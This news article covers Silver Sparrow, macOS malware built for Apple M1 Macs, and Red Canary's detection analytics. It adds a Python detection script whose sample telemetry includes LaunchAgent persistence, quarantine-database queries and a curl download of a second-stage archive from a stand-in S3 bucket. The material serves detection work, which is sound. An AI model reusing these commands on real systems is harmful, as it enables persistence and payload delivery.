Security firm Red Canary has discovered the second known piece of malware compiled to run natively on Apple's M1 Macs.
Although the malware has not yet delivered a malicious payload, Red Canary says it could be a "reasonably serious threat":
Though we haven't observed Silver Sparrow delivering additional malicious payloads yet, its forward-looking M1 chip compatibility, global reach, relatively high infection rate, and operational maturity suggest Silver Sparrow is a reasonably serious threat, uniquely positioned to deliver a potentially impactful payload at a moment's notice.
According to data provided by Malwarebytes, as of February 17 Silver Sparrow had infected 29,139 macOS systems in 153 countries, including "high volumes of detection in the United States, the United Kingdom, Canada, France, and Germany." Red Canary did not specify how many of these systems are M1 Macs.
Because the Silver Sparrow binaries "don't seem to do all that much" yet, Red Canary refers to them as "bystander binaries." When executed on an Intel-based Mac, the package only displays a blank window with the message "Hello, World!", while the Apple Silicon binary produces a red window reading "You did it!".
Red Canary shared detection methods for several macOS threats, though these steps are not specific to Silver Sparrow:
- Look for a process that appears to be PlistBuddy executing with a command line containing the following: LaunchAgents, RunAtLoad, and true. This analytic helps us find multiple macOS malware families establishing LaunchAgent persistence.
- Look for a process that appears to be sqlite3 executing with a command line containing the following: LSQuarantine. This analytic helps us find multiple macOS malware families manipulating or searching the metadata of downloaded files.
- Look for a process that appears to be curl executing with a command line containing the following: s3.amazonaws.com. This analytic helps us find multiple macOS malware families using S3 buckets for distribution.
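The three analytics above are easy to run over endpoint process telemetry. The following is an added example written for this article, not Red Canary's own detection code: it encodes each analytic as a process name plus a set of command-line tokens, runs them over a handful of constructed process-execution records (in an assumed "pid, image path, command line" tab-separated format; the paths, bucket name and agent label are made up), and returns the hits. The last record illustrates a limitation of name-based matching: a renamed copy of curl fetching the same S3 URL is not caught.

```python
"""Toy implementation of the three macOS analytics quoted above.

Added example, not Red Canary's code. The telemetry records are constructed
sample data in an assumed "pid<TAB>image<TAB>cmdline" format.
"""
import os

# Each analytic: (name, expected process basename, tokens that must ALL
# appear in the command line). Matching is case-insensitive so that
# "RunAtLoad"/"runatload" and "True"/"true" are treated alike.
ANALYTICS = [
    ("launchagent_persistence", "plistbuddy", ("launchagents", "runatload", "true")),
    ("quarantine_db_access", "sqlite3", ("lsquarantine",)),
    ("s3_download", "curl", ("s3.amazonaws.com",)),
]


def parse_event(line):
    """Parse one constructed telemetry record into (pid, image, cmdline)."""
    pid, image, cmdline = line.rstrip("\n").split("\t", 2)
    return int(pid), image, cmdline


def match_analytics(image, cmdline):
    """Return the names of every analytic that this process event satisfies."""
    name = os.path.basename(image).lower()  # compare on the executable's basename
    cl = cmdline.lower()
    return [analytic for analytic, proc, tokens in ANALYTICS
            if name == proc and all(t in cl for t in tokens)]


def detect(lines):
    """Run all analytics over telemetry lines; return [(pid, analytic), ...]."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        pid, image, cmdline = parse_event(line)
        for analytic in match_analytics(image, cmdline):
            hits.append((pid, analytic))
    return hits


# Constructed sample telemetry (not real captures). Paths and names are made up.
SAMPLE_TELEMETRY = [
    # Suspicious: PlistBuddy writing a LaunchAgent with RunAtLoad = true
    "101\t/usr/libexec/PlistBuddy\t/usr/libexec/PlistBuddy -c 'Add :Label string com.example.agent' "
    "-c 'Add :RunAtLoad bool true' /Users/alice/Library/LaunchAgents/com.example.agent.plist",
    # Benign: PlistBuddy merely reading a bundle version
    "102\t/usr/libexec/PlistBuddy\t/usr/libexec/PlistBuddy -c 'Print :CFBundleVersion' "
    "/Applications/Example.app/Contents/Info.plist",
    # Suspicious: sqlite3 querying the LaunchServices quarantine database
    "103\t/usr/bin/sqlite3\tsqlite3 /Users/alice/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 "
    "'select LSQuarantineDataURLString from LSQuarantineEvent'",
    # Suspicious: curl pulling a second stage from an S3 bucket
    "104\t/usr/bin/curl\tcurl -fsSL https://example-bucket.s3.amazonaws.com/stage2.tar.gz -o /tmp/stage2.tar.gz",
    # Benign: curl to an unrelated host
    "105\t/usr/bin/curl\tcurl -s https://example.com/",
    # Evasion: the same S3 download via a renamed copy of curl; name matching misses it
    "106\t/tmp/.c\t/tmp/.c -fsSL https://example-bucket.s3.amazonaws.com/stage2.tar.gz -o /tmp/stage2.tar.gz",
]


if __name__ == "__main__":
    for pid, analytic in detect(SAMPLE_TELEMETRY):
        print(f"pid {pid}: {analytic}")
```

Running the block flags pids 101, 103 and 104 and stays silent on the benign records and on the renamed-curl record. The analytics key on the executable name, so a sensor that also records the binary's hash or code-signing identity gives a more robust anchor than the basename alone.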
The first malware able to run natively on M1 Macs had been discovered only a few days earlier. For technical details on this second sample, see Red Canary's blog post; Technology studio also has a good explainer.